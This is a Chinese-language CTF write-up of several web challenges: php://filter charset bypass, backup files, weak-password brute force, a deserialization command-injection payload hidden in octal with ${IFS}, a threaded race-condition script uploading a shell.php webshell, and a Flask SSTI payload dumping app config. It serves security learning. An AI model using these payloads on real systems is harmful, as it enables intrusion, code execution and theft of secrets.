题目名称-文件包含
今天的题大概提一下解题思路就好了
![](https://i-blog.csdnimg.cn/direct/1aec3f423b8446db96104bb4d1c57a03.png)
这里要使用php://filter 在此基础上因为网页过滤了一些关键字 我们要进行爆破
cpp
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
就得到了cyberpeace{d85dfd5b23264ede9fc8e1f9bc93a382}
back up
这是一个备份文件的题
/index.php.bak
常见备份文件后缀 :
.git .svn .swp .~ .bak .bash_history .bak
![](https://i-blog.csdnimg.cn/direct/71212f032bbb464bbcbc920f859ae8cc.png)
weak_auth
题目描述告诉我们随手设的密码 所以可能是弱密码 我们可以直接进行爆破
![](https://i-blog.csdnimg.cn/direct/30712477425e4209b8ed0a825bb52fe7.png)
![](https://i-blog.csdnimg.cn/direct/0cacce1b8cb84cf4ab5528e4d037e5d5.png)
很轻松就得到了flag
unseping
![](https://i-blog.csdnimg.cn/direct/35f92e2a294e446dae72fc3b2017f3ab.png)
又是php代码的审计 这跟昨天写的差不多 都是base编码后反序列化传入 我们中间可以使用正则绕过
wp的payload
a = new ease("ping",array('(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
![](https://i-blog.csdnimg.cn/direct/89e65b891f2a479f9b75acc01332cfa1.png)
wzsc_文件上传
python
import requests
import threading
import os
class RaceCondition(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.url = 'http://61.147.171.105:62418/upload/a.php'
self.uploadUrl = 'http://61.147.171.105:62418/upload/shell.php'
def _get(self):
print('try to call uploaded file...')
r = requests.get(self.url)
if r.status_code == 200:
print('[*] create file shell.php success.')
os._exit(0)
def _upload(self):
print('upload file...')
rs = requests.get(self.uploadUrl)
if rs.status_code == 200:
print('[*] create file shell.php success.')
os._exit(0)
def run(self):
while True:
for i in range(5):
self._get()
for i in range(10):
self._upload()
self._get()
if __name__ == '__main__':
threads = 50
for i in range(threads):
t = RaceCondition()
t.start()
for i in range(threads):
t.join()
这道题我的蚁剑有问题 所以只放了wp的脚本 但我的文件上传也一直不成功
shrine
![](https://i-blog.csdnimg.cn/direct/ade043e9a5694d8bbfadeb7b5596956d.png)
不规则 我们查看源码
![](https://i-blog.csdnimg.cn/direct/56306717deb948f186940ea450b1ff65.png)
61.147.171.105:64225/shrine/%7B%7Bget_flashed_messages.globals['current_app'].config%7D%7D
![](https://i-blog.csdnimg.cn/direct/1e06a8fc98b74c75abfa16b21121a9f4.png)
这是在shrine路径下的ssti注入,由于过滤了config 和self,可以用get_flashed_messages函数
SSTI
是一种Web应用漏洞,攻击者通过注入恶意模板代码,使服务器在渲染模板时执行这些代码,从而导致敏感信息泄露、代码执行、命令执行等问题
SSTI漏洞的产生主要是因为Web应用程序在使用模板引擎时,未对用户输入进行严格过滤或验证,直接将用户输入作为模板内容的一部分进行渲染
get_flashed_messages函数
是 Flask 框架中用于获取闪现消息(Flash Messages)的函数。闪现消息是一种在请求结束时记录消息,并在下一个请求中访问这些消息的机制,通常用于在重定向后显示一次性消息